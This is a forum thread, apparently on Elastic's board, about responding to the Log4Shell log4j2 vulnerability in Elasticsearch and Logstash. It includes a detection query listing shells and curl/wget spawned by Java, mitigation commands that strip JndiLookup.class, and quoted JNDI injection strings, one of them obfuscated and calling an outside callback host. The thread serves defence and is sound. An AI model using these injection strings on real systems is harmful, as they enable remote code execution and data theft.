Zero-day exploit in log4j2, which is part of Elasticsearch

Which datasets are needed for this query to work:

sequence by host.id with maxspan=1m
 [network where event.action == "connection_attempted" and 
  process.name : "java" and
  /* 
     outbound connection attempt to 
     LDAP, RMI or DNS standard ports 
     by JAVA process 
   */ 
  destination.port in (1389, 389, 1099, 53, 5353)] by process.pid
 [process where event.type == "start" and 

  /* Suspicious JAVA child process */
  process.parent.name : "java" and
   process.name : ("sh", 
                   "bash", 
                   "dash", 
                   "ksh", 
                   "tcsh", 
                   "zsh", 
                   "curl",
                   "perl*",
                   "python*",
                   "ruby*",
                   "php*", 
                   "wget")] by process.parent.pid

Working? I was hoping the Auditbeat process or socket dataset would be enough, but I cannot find event.action == "connection_attempted" there. Is Elastic Endpoint Security data required? Can I make this query work with only the Auditbeat socket dataset?

Maybe by adding network_flow to the event.action filter? But the Auditbeat socket dataset seems to be missing process.parent.pid.

I would have expected a more solid response from Elastic.

It is stated that Logstash is not vulnerable, relying on an up-to-date JDK where loading external code over LDAP is disabled. But Logstash also includes SnakeYAML and possibly other libraries that allow JNDI injection. Relying solely on an up-to-date JDK seems like a very weak and insecure response to me.

Also see PSA: Log4Shell and the current state of JNDI injection – Random ramblings, exploits and projects.

You realize you are talking about one of the biggest, if not the biggest, security issues ever in Java, which is being actively exploited and is much bigger than something like the Equifax data breach?

I'm no Elastic customer, so I'm not in a position to make any demands, but I am now also 100% certain I never will be.


I did some digging and it appears that Logstash plugins which depend on an older version of logstash-core-plugin-api may also be affected, even when Logstash is updated to include log4j v2.15.0.

It appears that the logstash-core gem depends on an old, vulnerable version of log4j as well, e.g. logstash-core | RubyGems.org | your community gem host.

Logstash plugins depend on logstash-core-plugin-api, which depends on logstash-core, so it's a transitive dependency of the plugin (and as such gets pulled in when bundling all the dependencies for distribution). A lot of plugins bundle all their dependencies in the gems they push to RubyGems.

It appears that the latest version of logstash-core (logstash-core | RubyGems.org | your community gem host) doesn't specify log4j as a dependency anymore (how does that work now? Does it just use the log4j bundled with Logstash core?).

Can someone please double check and confirm my thinking? Thanks.


@Kami I think this would make more sense as a dedicated thread in the Logstash section; unless you want to report a security issue, in which case it's Security issues | Elastic. But I think you're more after understanding and discussing best practices going forward?
And I assume that Logstash, with its plugin architecture and dependencies, will be the most complicated product to "get right". bump log4j version to 2.15.0 (#13494) · elastic/logstash@c12d2f5 · GitHub alone might not be enough.


@MikeN123 I don't think that's the full picture: over 100 people evaluated all potentially vulnerable projects, worked on detection mechanisms, and documented it in Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security | Elastic Blog within 24h. It took some time to get it as correct and complete as possible in that timeframe — nobody wants a "well, actually ..." every 2 hours.

And we knew that, thanks to the Java Security Manager in Elasticsearch, this wasn't a remote code execution situation — why should your logging library be allowed to call random URLs, after all? The extra work we put into security features has actually paid off.


You had 100 people working on this, but they couldn't get a fixed Logstash build out? That's disturbing.

And I was just replying to one of the Elastic people saying "it's the weekend", which is just not something you should say about an urgent security issue like this.

Also note that this is not only about calling random URLs. That is what the PoC does, yes, but exploitation using other gadgets is possible. That may still be prevented by the (deprecated) SecurityManager, I don't know, but please don't think this is only about jndi:ldap.

  1. You underestimate the work it takes to build, test individually, and test in combination all of the artifacts on all the supported platforms that an Elastic Stack release requires. 7.16.1 and 6.8.21 are rare emergency releases that will come out shortly. This is getting all the attention that it should.
  2. I'm sorry if that comment came off the wrong way — it doesn't cover all the work that has been going into this behind the scenes.
  3. Yes, it's still an information disclosure issue for Elasticsearch, but there is a mitigation, and you should upgrade once the release is available. It's been a bad weekend for everyone, but we're all in this together and need to work it out : )
  1. Is this a problem on Elastic Cloud for ES6 and ES7? (As I understand it, it is not.)
  2. Is this a problem on Elastic Cloud for clusters not yet upgraded (ES5)? I could not find any info on this (yes, upgrading to ES6/ES7 will be a priority this week...).

@elastic Thanks for all the effort you are putting into this. Please focus on making sure the patch works and fully covers Logstash, so we don't have to install 7.16.2 in a few days.

So is it possible to provide a SIEM rule which does not require the Elastic Endpoint Security agent process dataset? (See my previous post.)

Thanks for the response.

Sorry, this post should have gone in the Logstash section. I will open a new thread there.

And yeah, I'm mostly interested in the best practices and how other plugins which may be affected plan to handle that.

As a workaround for Logstash: applying the following filter before attempting to parse the event seems to mitigate the issue.

  if "jndi:" in [message] {
    mutate {
      gsub => [
        "[message]", "jndi", "BLART"
      ]
    }
  }

Using the same testing approach you did, I can confirm that my canary token is NOT triggered if this appears before the json {} filter.

Logstash output

[2021-12-12T10:33:08,722][WARN ][logstash.filters.json    ][main][18d8528acb4b1628914404ffc234140d00f6c382fc7f21dbd350ac59bbd38fa5] Error parsing json {:source=>"message", :raw=>"${BLART:ldap://xxx.canarytokens.com/a}", :exception=>#<LogStash::Json::ParserError: Unrecognized token '$': was expecting ('true', 'false' or 'null')
 at [Source: (byte[])"${BLART:ldap://xxx.canarytokens.com/a}"; line: 1, column: 3]>}
{
          "host" => "c1523f8434cf",
       "message" => "${BLART:ldap://xxx.canarytokens.com/a}",
          "tags" => [
        [0] "_jsonparsefailure"
    ],
      "@version" => "1",
          "type" => "stdin",
    "@timestamp" => 2021-12-12T10:33:08.534Z
}
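For quick local testing outside of Logstash, the same defanging idea can be sketched in Python. This is a hypothetical helper for illustration only, not part of the official mitigation, and, like the gsub filter above, it only matches the literal "jndi" string, so obfuscated payloads slip through (as noted later in this thread):

```python
def neutralize_jndi(message: str) -> str:
    """Defang the JNDI lookup trigger before the string reaches any
    log4j-backed parser. Mirrors the Logstash gsub workaround above:
    it matches the literal "jndi" only, so obfuscated variants
    (e.g. ${${lower:j}ndi:...}) are NOT caught."""
    if "jndi:" in message:
        return message.replace("jndi", "BLART")
    return message

print(neutralize_jndi("${jndi:ldap://xxx.canarytokens.com/a}"))
# -> ${BLART:ldap://xxx.canarytokens.com/a}
```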

Does Logstash need to be restarted after doing:

zip -q -d <LOGSTASH_HOME>/logstash-core/lib/jars/log4j-core-2.* org/apache/logging/log4j/core/lookup/JndiLookup.class

?

On a somewhat related note: you should also make sure that this command indeed removes JndiLookup.class from the jar.

In my case, when testing it, that didn't happen: glob expansion didn't work correctly with zip, so I needed to specify the full path to the log4j jar.

Here is the temporary workaround I'm using (from a Dockerfile):

# Locate every bundled log4j-core jar (plugins may vendor their own copy)
RUN find /opt/logstash/ -name "*log4j*core*.jar" 2>&1

# Show the JNDI-related classes before removal
RUN jar tf /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar | grep -i jndi
RUN jar tf /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar | grep -i jndi

# Remove JndiLookup.class from both jars (full paths, no globs)
RUN zip -q -d /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
RUN zip -q -d /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

# Verify JndiLookup.class no longer appears in the listings
RUN jar tf /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar | grep -i jndi
RUN jar tf /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar | grep -i jndi

In my case, I verify that the JndiLookup class has been correctly removed by grepping the jar contents before and after, and I also remove that class from the log4j jar which comes bundled with a plugin.
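As an environment-independent way to do the same removal and verification, here is a sketch using Python's standard zipfile module (a zip archive cannot be edited in place with zipfile, so the jar is rewritten without the entry). This is an illustrative alternative under my own assumptions, not the command from the advisory:

```python
import os
import shutil
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def strip_jndilookup(jar_path: str) -> bool:
    """Rewrite the jar without JndiLookup.class; return True if it was removed."""
    fd, tmp_path = tempfile.mkstemp(suffix=".jar")
    os.close(fd)
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp_path, "w") as dst:
        for item in src.infolist():
            if item.filename == JNDI_CLASS:
                removed = True
                continue  # drop this entry from the rewritten jar
            dst.writestr(item, src.read(item.filename))
    shutil.move(tmp_path, jar_path)
    return removed

def jar_contains_jndilookup(jar_path: str) -> bool:
    """Post-removal check, roughly `jar tf ... | grep -i jndilookup`."""
    with zipfile.ZipFile(jar_path) as jar:
        return any("jndilookup" in name.lower() for name in jar.namelist())
```

Point strip_jndilookup at each log4j-core jar found (including plugin-vendored copies), then confirm jar_contains_jndilookup returns False before restarting Logstash.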


Thanks @Kami

@elastic Please update the Elastic Security Announcement for Log4Shell with updated commands to also remove the class from Logstash plugins etc. (if necessary)? And please let me know if a Logstash restart is required after removal of the class.

Please be aware that it's possible to trigger a JNDI lookup from an input plugin, before any filter kicks in; therefore I'd refrain from relying on this workaround.
The only known mitigation until the release is out is to remove the class from the log4j jar, as stated in the advisory.


@willemdh the advisory will be updated to note the need to restart after removing the class from the jar.

remove the class from Logstash plugins etc? (if necessary)

This won't be necessary, as the loaded log4j-core jar is the one from logstash-core.


Please, how can I check exactly whether my self-hosted Elastic version is exploitable or not?

Well, but be aware of obfuscation. I've found the following in my logs:

${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"

so the query doesn't match.
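To illustrate why: in that payload only the scheme ("ldap") is obfuscated, so a rule matching the literal "jndi:ldap" misses it, while a broader check for the "${jndi:" prefix still fires. Note that the "jndi" token itself can be obfuscated too (e.g. ${${lower:j}ndi:...}), so pattern matching alone remains fragile. A minimal sketch with hypothetical patterns:

```python
import re

# Obfuscated payload as seen in the logs above
payload = "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"

# Strict pattern, as a naive detection rule might use: misses the payload
strict = re.compile(r"\$\{jndi:ldap://", re.IGNORECASE)
# Looser prefix pattern: still matches, since "jndi" itself is not obfuscated here
loose = re.compile(r"\$\{jndi:", re.IGNORECASE)

assert strict.search(payload) is None
assert loose.search(payload) is not None
```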

Is there any indication when 7.16.1 is being released?

Edit: I read over it, sorry. Target is today.